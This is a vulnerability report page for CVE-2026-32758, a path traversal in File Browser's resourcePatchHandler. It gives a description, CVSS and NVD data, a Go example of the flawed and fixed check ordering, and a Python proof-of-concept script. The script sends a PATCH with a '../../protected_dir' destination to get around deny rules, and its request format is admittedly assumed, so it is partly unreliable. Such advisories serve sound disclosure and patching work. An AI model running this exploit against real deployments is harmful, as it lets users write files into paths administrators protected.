Security Vulnerability Report
CVE-2026-32758 CVSS 6.5 MEDIUM

Published: 2026-03-20 00:16:17
Last Modified: 2026-03-23 16:55:21

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Versions 2.61.2 and below are vulnerable to Path Traversal through the resourcePatchHandler (http/resource.go). The destination path in resourcePatchHandler is validated against access rules before being cleaned/normalized, while the actual file operation calls path.Clean() afterward—resolving .. sequences into a different effective path. This allows an authenticated user with Create or Rename permissions to bypass administrator-configured deny rules (both prefix-based and regex-based) by injecting .. sequences in the destination parameter of a PATCH request. As a result, the user can write or move files into any deny-rule-protected path within their scope. However, this cannot be used to escape the user's BasePathFs scope or read from restricted paths. This issue has been fixed in version 2.62.0.
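The check-then-clean ordering the description attributes to resourcePatchHandler, beside the clean-then-check ordering that closes the gap, as an added Go example: the Rule type, the function names and the deny rules are constructed here and are not File Browser's own code.

```go
package main

import (
	"fmt"
	"path"
	"regexp"
	"strings"
)

// Rule is a hypothetical stand-in for one administrator-configured deny rule,
// either prefix-based or regex-based (the two kinds the advisory names).
type Rule struct {
	Prefix string
	Regex  *regexp.Regexp
}

// denied reports whether any rule matches the candidate path.
func denied(rules []Rule, p string) bool {
	for _, r := range rules {
		if (r.Regex != nil && r.Regex.MatchString(p)) || (r.Regex == nil && strings.HasPrefix(p, r.Prefix)) {
			return true
		}
	}
	return false
}

// checkDestinationVulnerable mirrors the ordering described for <= 2.61.2: the raw
// destination is validated first and path.Clean runs afterwards, so ".." changes
// the effective path after the check has already passed.
func checkDestinationVulnerable(rules []Rule, dst string) (string, error) {
	if denied(rules, dst) {
		return "", fmt.Errorf("forbidden: %s", dst)
	}
	return path.Clean("/" + dst), nil // anchored at the scope root; ".." is resolved only now
}

// checkDestinationFixed normalizes first, so the path that is validated is exactly the
// path the file operation will use; anchoring at "/" also keeps a leading ".." inside the scope root.
func checkDestinationFixed(rules []Rule, dst string) (string, error) {
	clean := path.Clean("/" + dst)
	if denied(rules, clean) {
		return "", fmt.Errorf("forbidden: %s", clean)
	}
	return clean, nil
}

// demoRules returns constructed deny rules protecting /protected_dir by prefix and by regex.
func demoRules() []Rule {
	return []Rule{{Prefix: "/protected_dir"}, {Regex: regexp.MustCompile(`^/protected_dir(/|$)`)}}
}
```

With the rules above, a destination such as `../../protected_dir/malicious.txt` passes the vulnerable check and lands in `/protected_dir`, while the fixed ordering rejects it and still accepts a benign `uploads/report.txt`.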

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE
File Browser <= 2.61.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# Configuration
target_url = "http://example.com/api/resources/"
username = "attacker"
password = "password"
login_url = "http://example.com/api/login"

# 1. Authenticate
session = requests.Session()
login_data = {"username": username, "password": password}
response = session.post(login_url, data=login_data)
if response.status_code != 200:
    print("Login failed")
    exit(1)

# 2. Prepare malicious payload
# Attempt to move 'malicious.txt' to a protected directory using path traversal
source_file = "malicious.txt"
# The destination contains '../' to bypass deny rules configured on 'protected_dir'
destination_path = "../../protected_dir/malicious.txt"
headers = {"Content-Type": "application/json"}
payload = {
    "action": "move",  # or 'rename' depending on context
    "destination": destination_path,
    "overwrite": True
}

# 3. Send Exploit Request
# Assuming the endpoint structure based on resourcePatchHandler description
exploit_url = f"{target_url}{source_file}"
response = session.patch(exploit_url, headers=headers, data=json.dumps(payload))
if response.status_code == 200:
    print("[+] Exploit successful! File moved to restricted path.")
else:
    print(f"[-] Exploit failed. Status code: {response.status_code}")
    print(response.text)
```

References

https://github.com/filebrowser/filebrowser/commit/4bd7d69c82163b201a987e99c0c50d7ecc6ee5f1 (Patch)
https://github.com/filebrowser/filebrowser/releases/tag/v2.62.0 (Product, Release Notes)
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-9f3r-2vgw-m8xp (Mitigation, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-32758",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T00:16:17.093",
    "lastModified": "2026-03-23T16:55:20.893",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Versions 2.61.2 and below are vulnerable to Path Traversal through the resourcePatchHandler (http/resource.go). The destination path in resourcePatchHandler is validated against access rules before being cleaned/normalized, while the actual file operation calls path.Clean() afterward—resolving .. sequences into a different effective path. This allows an authenticated user with Create or Rename permissions to bypass administrator-configured deny rules (both prefix-based and regex-based) by injecting .. sequences in the destination parameter of a PATCH request. As a result, the user can write or move files into any deny-rule-protected path within their scope. However, this cannot be used to escape the user's BasePathFs scope or read from restricted paths. This issue has been fixed in version 2.62.0."
      },
      {
        "lang": "es",
        "value": "File Browser es una interfaz de gestión de archivos para subir, eliminar, previsualizar, renombrar y editar archivos dentro de un directorio especificado. Las versiones 2.61.2 e inferiores son vulnerables a Salto de ruta a través del resourcePatchHandler (http/resource.go). La ruta de destino en resourcePatchHandler se valida contra las reglas de acceso antes de ser limpiada/normalizada, mientras que la operación de archivo real llama a path.Clean() después, resolviendo secuencias de .. en una ruta efectiva diferente. Esto permite a un usuario autenticado con permisos de Creación o Renombrado eludir las reglas de denegación configuradas por el administrador (tanto basadas en prefijos como en expresiones regulares) inyectando secuencias de .. en el parámetro de destino de una solicitud PATCH. Como resultado, el usuario puede escribir o mover archivos a cualquier ruta protegida por reglas de denegación dentro de su ámbito. Sin embargo, esto no puede usarse para escapar del ámbito BasePathFs del usuario o leer de rutas restringidas. Este problema ha sido solucionado en la versión 2.62.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"},
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.62.0",
                "matchCriteriaId": "7E5C9E4B-8749-44EA-AB8D-1292D4C9DB65"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/filebrowser/filebrowser/commit/4bd7d69c82163b201a987e99c0c50d7ecc6ee5f1", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-9f3r-2vgw-m8xp", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}
    ]
  }
}
```